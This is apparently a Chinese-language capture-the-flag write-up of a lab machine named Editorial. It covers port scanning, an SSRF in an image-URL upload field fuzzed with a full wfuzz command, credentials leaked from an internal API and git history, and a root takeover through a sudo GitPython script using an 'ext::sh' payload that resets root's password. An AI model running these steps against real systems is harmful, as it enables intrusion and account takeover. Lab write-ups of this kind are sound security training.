目标信息
IP地址:
10.129.196.85(非固定IP地址)
信息收集
ICMP检测
PING 10.129.196.85 (10.129.196.85) 56(84) bytes of data.
64 bytes from 10.129.196.85: icmp_seq=1 ttl=63 time=414 ms
64 bytes from 10.129.196.85: icmp_seq=2 ttl=63 time=426 ms
64 bytes from 10.129.196.85: icmp_seq=3 ttl=63 time=895 ms
64 bytes from 10.129.196.85: icmp_seq=4 ttl=63 time=534 ms
--- 10.129.196.85 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3002ms
rtt min/avg/max/mdev = 413.875/567.316/895.136/194.939 ms攻击机和靶机间网络连接状态较差。
防火墙检测
# Nmap 7.99 scan initiated Fri May 8 08:41:55 2026 as: /usr/lib/nmap/nmap -sF -p- --min-rate 3000 -oN fin_result.txt 10.129.196.85
Nmap scan report for 10.129.196.85
Host is up (7.2s latency).
All 65535 scanned ports on 10.129.196.85 are in ignored states.
Not shown: 54852 open|filtered tcp ports (no-response), 10683 closed tcp ports (reset)
# Nmap done at Fri May 8 08:43:58 2026 -- 1 IP address (1 host up) scanned in 122.19 seconds无法探测靶机防火墙状态。
网络端口扫描
TCP端口扫描结果
# Nmap 7.99 scan initiated Fri May 8 08:54:10 2026 as: /usr/lib/nmap/nmap -sT -sV -A -p- --min-rate 3000 -oN tcp_result.txt 10.129.196.85
Warning: 10.129.196.85 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.129.196.85
Host is up (0.45s latency).
Not shown: 49174 closed tcp ports (conn-refused), 16359 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 0d:ed:b2:9c:e2:53:fb:d4:c8:c1:19:6e:75:80:d8:64 (ECDSA)
|_ 256 0f:b9:a7:51:0e:00:d5:7b:5b:7c:5f:bf:2b:ed:53:a0 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://editorial.htb
|_http-server-header: nginx/1.18.0 (Ubuntu)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using proto 1/icmp)
HOP RTT ADDRESS
1 632.35 ms 10.10.16.1
2 701.03 ms 10.129.196.85
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri May 8 08:57:27 2026 -- 1 IP address (1 host up) scanned in 196.70 secondsUDP端口开放列表扫描结果
# Nmap 7.99 scan initiated Fri May 8 09:00:35 2026 as: /usr/lib/nmap/nmap -sU -p- --min-rate 3000 -oN udp_ports.txt 10.129.196.85
Warning: 10.129.196.85 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.129.196.85
Host is up (0.73s latency).
All 65535 scanned ports on 10.129.196.85 are in ignored states.
Not shown: 65431 open|filtered udp ports (no-response), 104 closed udp ports (port-unreach)
# Nmap done at Fri May 8 09:05:21 2026 -- 1 IP address (1 host up) scanned in 286.11 secondsUDP端口详细信息扫描结果
(无)同时发现靶机运行Ubuntu Linux操作系统,开放了22/ssh和80/http服务,主域名为editorial.htb,中间件为Nginx。
服务探测
SSH服务(22端口)
尝试使用ssh工具连接靶机,确定其登录方式:
ssh root@editorial.htb
发现靶机允许使用密钥和密码两种方式登录。
Web应用程序(80端口)
打开主页:http://editorial.htb/
发现该站点貌似为一家出版社的主页,页面顶栏存在Home、Publish with us和About三个链接。
点击Publish with us链接,页面跳转到了新书出版申请页面/upload:
发现申请表单上方为新书图像的上传区域,支持用户输入图像URL或直接上传。尝试复制一张图片,在本地启动SimpleHTTPServer监听,随后尝试通过输入URL的方式,让服务端下载图像文件:
成功!怀疑此处存在SSRF漏洞。
渗透测试
SSRF漏洞探测内网服务
在Web服务探测阶段,我们成功发现站点/upload页面存在根据用户输入URL下载图片的功能,现在尝试使用BurpSuite进行抓包,测试SSRF漏洞。
启动BurpSuite后重新输入图像文件URL并点击Preview按钮,抓取HTTP流量:
发现上传请求包为POST表单,参数bookurl为图像文件URL参数;当URL正确时,接口根据URL下载文件,下载完毕后返回文件的访问链接,如URL不正确,则会直接返回站点默认的图标链接,表示文件不存在或下载错误:
尝试将URL更换为file://伪协议,试图加载/etc/passwd文件,但页面直接返回了默认图标链接,且无法使用添加../字符等一系列方法绕过:
思索片刻后,决定使用http协议进行端口扫描,以探测靶机本地上开放的Web服务。直接启动wfuzz工具,将URL中的端口号设置为模糊参数,并过滤响应内容为站点默认图标URL的请求尝试:
wfuzz -c -z range,1-65535 -t 70 -X POST -H "Content-Type: multipart/form-data; boundary=----geckoformboundary87253bb3479ab18eb86a5591026effd4" -d '------geckoformboundary87253bb3479ab18eb86a5591026effd4
Content-Disposition: form-data; name="bookurl"
http://127.0.0.1:FUZZ/
------geckoformboundary87253bb3479ab18eb86a5591026effd4
Content-Disposition: form-data; name="bookfile"; filename=""
Content-Type: application/octet-stream
------geckoformboundary87253bb3479ab18eb86a5591026effd4--' --hs "/static/images/unsplash_photo_1630734277837_ebe62757b6e0.jpeg" http://editorial.htb/upload-cover
成功发现靶机本地开放5000/http服务!
API渗透获取系统用户凭据
在之前的SSRF漏洞利用过程中,我们成功发现了靶机在本地开启了5000/http服务,现在通过SSRF漏洞对Web服务进行访问。直接将/upload-cover接口bookurl参数值改为http://127.0.0.1:5000/后发送请求包:
随后访问返回的下载文件路径:
显然内网5000端口Web服务返回了JSON格式的API端点列表:
/api/latest/metadata
/api/latest/metadata/changelog
/api/latest/metadata/messages/promos
/api/latest/metadata/messages/coupons
/api/latest/metadata/messages/authors
/api/latest/metadata/messages/how_to_use_platform通过SSRF漏洞逐个对上述端点进行访问,在访问authors接口时,发现了硬编码在用户描述信息中的凭据:
http://127.0.0.1:5000/api/latest/metadata/messages/authors
- 用户名:
dev - 密码:
dev080217_devAPI!@
直接登录SSH:
ssh dev@editorial.htb
成功!!
权限提升
目录信息收集
登录dev用户后,进行本地信息收集。在用户家目录下发现apps子目录,该目录内存在.git元数据目录:
ls -lA ~/apps
尝试进入~/apps文件夹,使用git命令查看历史提交记录:
cd apps && git log
发现该Git目录内发生过5次提交,根据每次提交的描述,决定查看编号为1e84a036b2f33c59e2390730699a488c65643d28的提交记录:
git show 1e84a036b2f33c59e2390730699a488c65643d28
成功发现了内网服务历史版本源代码中的系统用户凭据:
- 用户名:
prod - 密码:
080217_Producti0n_2023!@
直接登录SSH:
ssh prod@editorial.htb
成功!
Sudo脚本 GitPython危险配置利用
登录prod用户后,执行sudo -l命令查看当前用户Sudo权限:
发现当前用户可以root身份,通过python3运行/opt/internal_apps/clone_changes/clone_prod_change.py脚本。直接查看脚本源代码:
#!/usr/bin/python3
import os
import sys
from git import Repo
os.chdir('/opt/internal_apps/clone_changes')
url_to_clone = sys.argv[1]
r = Repo.init('', bare=True)
r.clone_from(url_to_clone, 'new_changes', multi_options=["-c protocol.ext.allow=always"])可发现该脚本通过GitPython库实现了从目标Git地址克隆仓库的功能,而脚本在调用Repo.clone_from()方法时,开启了protocol.ext.allow配置项,导致攻击者可传入带有ext::sh伪协议的恶意地址,触发任意命令执行。
首先新建恶意脚本/tmp/changerootpw.sh:
cat << EOF > /tmp/changerootpw.sh
#!/bin/bash
echo "root:Asd310056" | chpasswd
EOF
chmod +x /tmp/changerootpw.sh
随后通过sudo启动clone_prod_change.py脚本,传入ext::sh伪协议地址即可:
sudo python3 /opt/internal_apps/clone_changes/clone_prod_change.py "ext::sh -c '/tmp/changerootpw.sh'"
su -
提权成功!!!!